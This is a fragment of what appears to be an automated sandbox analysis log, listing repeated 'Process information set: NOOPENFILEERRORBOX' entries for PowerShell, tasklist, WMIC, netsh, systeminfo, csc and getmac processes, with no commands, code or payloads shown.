              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
